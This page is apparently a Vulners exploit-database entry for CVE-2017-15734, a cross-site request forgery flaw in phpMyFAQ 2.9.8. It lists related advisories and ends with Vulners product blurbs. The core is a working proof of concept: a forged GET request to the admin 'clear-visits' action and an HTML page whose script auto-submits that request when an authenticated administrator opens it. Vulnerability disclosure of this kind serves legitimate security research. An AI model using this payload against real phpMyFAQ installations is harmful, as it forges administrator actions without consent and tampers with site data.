| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
| CVE-2017-15734 | 4 Dec 202521:02 | – | circl | |
| phpMyFAQ cross-site request forgery vulnerability (CNVD-2017-32428) | 23 Oct 201700:00 | – | cnvd | |
| CVE-2017-15734 | 21 Oct 201722:00 | – | cve | |
| CVE-2017-15734 | 21 Oct 201722:00 | – | cvelist | |
| EUVD-2017-7157 | 7 Oct 202500:30 | – | euvd | |
| CVE-2017-15734 | 22 Oct 201718:29 | – | nvd | |
| phpMyFAQ < 2.9.9 Multiple XSS And CSRF Vulnerabilities | 21 Sep 201700:00 | – | openvas | |
| 📄 phpMyFAQ 2.9.8 Cross Site Request Forgery | 4 Dec 202500:00 | – | packetstorm | |
| Cross site request forgery (csrf) | 22 Oct 201718:29 | – | prion | |
| CVE-2017-15734 | 22 May 202510:55 | – | redhatcve |
# Exploit Title: phpMyFAQ 2.9.8 - Cross-Site Request Forgery(CSRF)
# Date: 2024-10-26
# Exploit Author: CodeSecLab
# Vendor Homepage: https://github.com/thorsten/phpMyFAQ
# Software Link: https://github.com/thorsten/phpMyFAQ
# Version: 2.9.8
# Tested on: Ubuntu Windows
# CVE : CVE-2017-15734
PoC:
Get http://phpmyfaq/admin/index.php?action=clear-visits
Reproduction: While still logged in, open another browser window to access the link.
Some Details:
{
"Protection Mechanisms Before Patch": "No CSRF token validation was implemented in the 'clear-visits' action within the stat.main.php file, allowing requests to be made without verifying the authenticity of the request origin.",
"File Navigation Chain": "Public Access Entry URL: http://phpmyfaq/admin/index.php -> Vulnerable File: phpmyfaq/admin/stat.main.php",
"Execution Path Constraints": "The user must be authenticated and possess the appropriate permissions to access the 'clear-visits' action. The navigation to the vulnerable file relies on the 'action' parameter within the admin index.php file, which must be set to 'clear-visits'.",
"Request Parameters": "action=clear-visits",
"Request Method": "GET",
"Request URL": "http://phpmyfaq/admin/index.php?action=clear-visits",
"Final PoC": "<html>\n <body>\n <form action=\"http://phpmyfaq/admin/index.php?action=clear-visits\" method=\"GET\">\n <input type=\"submit\" value=\"Submit request\">\n </form>\n <script>\n document.forms[0].submit();\n </script>\n </body>\n</html>"
}
[Replace Your Domain Name]Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation